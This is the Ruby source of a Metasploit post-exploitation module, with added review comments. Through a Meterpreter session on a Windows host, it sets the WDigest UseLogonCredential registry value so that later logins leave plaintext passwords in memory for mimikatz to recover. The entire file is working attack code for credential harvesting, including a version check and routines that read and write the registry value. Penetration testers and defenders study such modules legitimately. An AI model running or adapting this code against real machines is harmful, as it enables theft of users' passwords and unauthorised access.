##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
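class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Version

  # Registry key of the WDigest security provider and the DWORD value this
  # module reads and writes. A change to this value is a well-known indicator;
  # registry-auditing and EDR rules commonly watch writes to it, so the
  # CONFIG_CHANGES side effect declared below is visible on the host.
  WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'.freeze
  USE_LOGON_CREDENTIAL = 'UseLogonCredential'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Post Manage WDigest Credential Caching',
        'Description' => %q{
          On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables
          credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.
          Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    # ENABLE selects which value (1 or 0) is written; defaults to enabling.
    register_options(
      [
        OptBool.new('ENABLE', [false, 'Enable the WDigest Credential Cache.', true])
      ]
    )
  end

  # Module entry point: reports the target, skips hosts older than the
  # version threshold, and otherwise dispatches on the ENABLE option.
  def run
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    # Check if OS is 8/2012 or newer. If not, no need to set the registry key
    # Can be backported to Windows 7, 2k8R2 but defaults to enabled...
    # NOTE(review): the comparison below uses Win7_SP0, so Windows 7 / 2008 R2
    # hosts are not skipped even though the note above talks about 8/2012;
    # the threshold is left unchanged here.
    version = get_version_info
    if version.build_number < Msf::WindowsVersion::Win7_SP0
      print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...')
    else
      datastore['ENABLE'] ? wdigest_enable : wdigest_disable
    end
  end

  # Reads the current UseLogonCredential value and reports it.
  #
  # @return [Integer, nil] the DWORD value, or nil when the value is not
  #   present (the default on a fresh install, as the status message notes)
  def get_key
    # Check if the key exists. Not present by default
    print_status("Checking if the #{WDIGEST_REG_LOCATION}\\#{USE_LOGON_CREDENTIAL} DWORD exists...")
    wdvalue = registry_getvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL)
    print_status("#{USE_LOGON_CREDENTIAL} is set to #{wdvalue}") unless wdvalue.nil?
    wdvalue
  rescue Rex::Post::Meterpreter::RequestError => e
    fail_with(Failure::Unknown, "Unable to access registry key: #{e}")
  end

  # Sets UseLogonCredential to 1 (no-op with a message if already 1).
  def wdigest_enable
    set_use_logon_credential(1, 'enabled')
  end

  # Sets UseLogonCredential to 0 (no-op with a message if already 0).
  def wdigest_disable
    set_use_logon_credential(0, 'disabled')
  end

  private

  # Shared body of wdigest_enable / wdigest_disable: the two differed only in
  # the target value and the word used in their status output.
  #
  # @param target [Integer] the DWORD value to write (0 or 1)
  # @param state [String] 'enabled' or 'disabled'; used only in messages
  # @return [void]
  def set_use_logon_credential(target, state)
    wdvalue = get_key

    # Nothing to do when the value is already what was requested.
    if wdvalue == target
      print_good("Registry value is already set. WDigest Security Provider is #{state}")
      return
    end

    # nil means the value does not exist yet and registry_setvaldata creates it.
    verb = wdvalue.nil? ? 'Creating' : 'Setting'
    print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as #{target}...")
    if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, target, 'REG_DWORD')
      print_good("WDigest Security Provider #{state}")
    else
      print_error('Unable to access registry key - insufficient privileges?')
    end
  rescue Rex::Post::Meterpreter::RequestError => e
    fail_with(Failure::Unknown, "Unable to access registry key: #{e}")
  end
end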